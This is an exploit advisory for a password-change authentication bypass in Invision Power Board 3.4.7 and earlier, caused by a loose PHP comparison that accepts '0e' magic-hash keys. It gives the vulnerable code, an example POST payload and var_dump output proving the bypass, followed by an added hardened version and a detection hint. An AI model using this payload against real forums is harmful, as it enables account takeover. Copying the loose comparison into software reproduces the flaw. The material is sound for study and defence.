Invision Power Board <= 3.4.7 password change

2014.11.25
Credit: Dmitry Hitry
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Invision Power Board <= 3.4.7 password change
# Date: 25.11.2014
# Exploit Author: ZeroDay
# Software Link: http://www.invisionpower.com/
# Version: <= 3.4.7
# Tested on: 3.4.7
# About: For the G-Owl with Love

Vulnerable code, interface/ipsconnect/ipsconnect.php:

    public function change( $id, $key, $username, $displayname, $email, $md5Password, $redirect, $redirectHash )
    {
        if ( $key != md5( $this->masterKey . $id ) )
        {
            $this->_return( base64_encode( $this->settings['board_url'] ), array( 'status' => 'BAD_KEY' ) );
        }

        $member = IPSMember::load( intval( $id ), 'none', 'id' );

        if ( !$member['member_id'] )
        {
            $this->_return( $redirect, array( 'status' => 'NO_USER' ) );
        }
        ...
    }

The problem is this line:

    if ( $key != md5( $this->masterKey . $id ) )

An incorrect loose comparison (!=) is used here. If the $this->masterKey variable is "1234", then, to pass the comparison check, the following POST parameters have to be sent:

    id=1x5306758&key=0e123

where "1x" is the user_id.

    var_dump(intval('1x5306758'));                 // int(1)
    var_dump(md5('1234'.'1x5306758'));             // string(32) "0e206089892480803868366430752394"
    var_dump('0e123' == md5('1234'.'1x5306758'));  // bool(true)

BUT! Since we do not know the $this->masterKey variable, the only things we will have to hope for are bruteforce and luck ;)
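As an added illustration (not code from the advisory or from Invision Power Board), the loose key check is shown beside a hardened form; the function names are assumptions and the "0e..." string used in the self-check is a constructed stand-in for a hash of that shape:

```php
<?php
// Added example, not IPB's code. Shows why "$key != md5(...)" is unsafe
// and how the same check looks when done strictly.

// Vulnerable shape (as in ipsconnect.php): != on two numeric-looking strings
// compares them as numbers, so a computed hash "0e<digits>" is numerically
// zero and equals any supplied key of the same shape, e.g. "0e123".
function keyIsValidLoose(string $masterKey, string $id, string $key): bool
{
    return !($key != md5($masterKey . $id));
}

// Hardened shape: the id must be a pure digit string, so a "1x..." prefix
// (which intval() would silently truncate to 1) is rejected before use,
// and the MAC is compared with hash_equals(), which is strict (no numeric
// coercion) and constant-time.
function keyIsValidStrict(string $masterKey, string $id, string $key): bool
{
    if (!ctype_digit($id)) {
        return false;
    }
    return hash_equals(md5($masterKey . $id), $key);
}

// Self-check on constructed values; the hash below is only an example of a
// string that begins with "0e" followed by digits, not a real md5 result.
$zeroEHash = '0e206089892480803868366430752394';

// Loose: both operands are numeric strings, so they compare as 0 == 0.
var_dump('0e123' == $zeroEHash);
// Strict: byte-wise comparison, the strings differ.
var_dump('0e123' === $zeroEHash);
var_dump(hash_equals($zeroEHash, '0e123'));
// intval() keeps only the leading digits of "1x5306758".
var_dump(intval('1x5306758'));
// The hardened check refuses the malformed id regardless of the key.
var_dump(keyIsValidStrict('1234', '1x5306758', '0e123'));
```

For detection, a request to ipsconnect.php whose id parameter is not a pure digit string, or whose key is a short "0e" prefixed value, does not match any legitimate IPS Connect client and is worth alerting on.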

References:

http://www.invisionpower.com/


Copyright 2024, cxsecurity.com